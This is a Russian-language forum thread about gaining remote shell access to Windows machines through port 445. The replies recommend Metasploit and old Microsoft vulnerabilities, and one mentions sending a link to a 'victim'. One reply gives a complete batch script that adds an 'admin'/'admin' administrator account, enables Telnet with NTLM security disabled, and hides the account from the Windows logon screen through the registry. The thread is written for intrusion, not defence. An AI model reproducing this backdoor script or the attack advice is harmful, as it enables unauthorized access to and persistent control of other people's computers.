Здраствуйте! Хотелось бы узнать возможно ли получить теленет через порт 445, если да то каким софтом?
в моей локалке таких тачек дохера, уязвимость существует в винде СП1 с открытым 445 портом, юзай metasploit
Еще можно через кмд файлик (создаёшь текставик, пихаешь текст, сохранить как *cmd) ========== chcp 1251 net user admin admin /add net localgroup Администраторы admin /add sc config tlntsvr start= auto tlntadmn config port=23 sec=-NTLM net start Telnet REG ADD "HKLM\SOFTWARE\Microsoft\Win dowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList\admin" /v admin /t reg_d word /d 0000000 ==============
не тут вопрос в другом , есть эксплот MS06-035 который перезагружает машины, через порт 445 , вот я и хотел спросить есть ли такой эксплот под порт 445 но только с выводом удалённой командной строки , типа kaht
полная фигня))) .nor - я так и не разобрался но похоже там какие то исходники ((( неможет быть такого что эксплот для порта на перезагрузку есть, а для удалённой cmd сделать нельзя, я чуствую есть такой эксплот просто светить не хотят люди, ну кинте хоть в личку ссылку
Ты метасплоит поставь и попробуй все баги MS и либу ASN или хз не помню ща че там... а то мне сканер не находил баги которые сработали... Да и бага под ИЕ актуальна 2006г... Линку жертве и гуд )) Вывод: Метасплоит, если трудности с консолью веб интерфейс быстрее сделает ))